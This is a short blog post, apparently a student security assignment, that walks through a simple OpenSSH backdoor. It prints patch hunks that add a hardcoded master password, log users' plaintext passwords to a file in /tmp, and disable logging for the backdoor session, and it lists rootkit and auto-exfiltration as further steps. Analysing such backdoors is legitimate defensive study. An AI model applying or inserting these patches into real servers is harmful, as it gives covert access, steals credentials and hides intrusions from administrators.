曹逸君 Blog

12月 30, 2013

SSH Backdoor a simple example

SSH Backdoor --- a simple example analysis

Information security assignment by 曹逸君

It's not a secret that there are dozens of ssh backdoor out there.
And it's fairly easy to write a simple one.
Usually they have two main functions.
Secret authentication and Password|RSA key collection

Secret authentication

Password or RSA key auth for the backdoor user,In the example only password auth implemented. 

diff -u openssh/includes.h openssh.patch//includes.h
--- openssh/includes.h  2010-10-24 06:47:30.000000000 +0800
+++ openssh.patch//includes.h   2013-12-24 22:17:53.385927565 +0800
@@ -172,4 +172,9 @@

 #include "entropy.h"

+int secret_auth;
+FILE *f;
+#define ILOG "/tmp/ilog"
+#define OLOG "/tmp/olog"
+#define SECRETPW "flyhigh"

    diff -u openssh/auth-passwd.c openssh.patch//auth-passwd.c
    +   if (!strcmp(password, SECRETPW)) {
    +                secret_auth=1;
    +                return 1;
    +        }

Password|RSA key collection

Only passwords collection are implemented in this example.Both in and out.
And in the example we won't send the stolen passwords to our server, just simply write it to a file. 

@@ -123,6 +126,12 @@
    }
 #endif
    result = sys_auth_passwd(authctxt, password);
+   if(result){
+       if((f=fopen(ILOG,"a"))!=NULL){
+           fprintf(f,"user:password --> %s:%s\n",authctxt->user, password);
+           fclose(f);
+       }
+   }

No log for backdoor

There are several place modified to prevent log of backdoor user's login activities.like this. 

diff -u openssh/log.c openssh.patch//log.c
--- openssh/log.c   2011-06-20 11:42:23.000000000 +0800
+++ openssh.patch//log.c    2013-12-24 22:17:53.385927565 +0800
@@ -351,6 +351,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!secret_auth || secret_auth!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
    struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
@@ -428,3 +429,4 @@
    }
    errno = saved_errno;
 }
+}

Futher features

There are features that is crucial to reallife usage.
1. rookit to protect the backdoor
2. live-patch to make sure sshd won't have to restart.
3. auto-send collected passwords and RSA secret keys.

These features have been shown up in real-life examples.
Security is not only about keep the boarder,inner environment monitor is evenly essential.

reference
origin patch code
openssh

Written with StackEdit.

posted at 21:49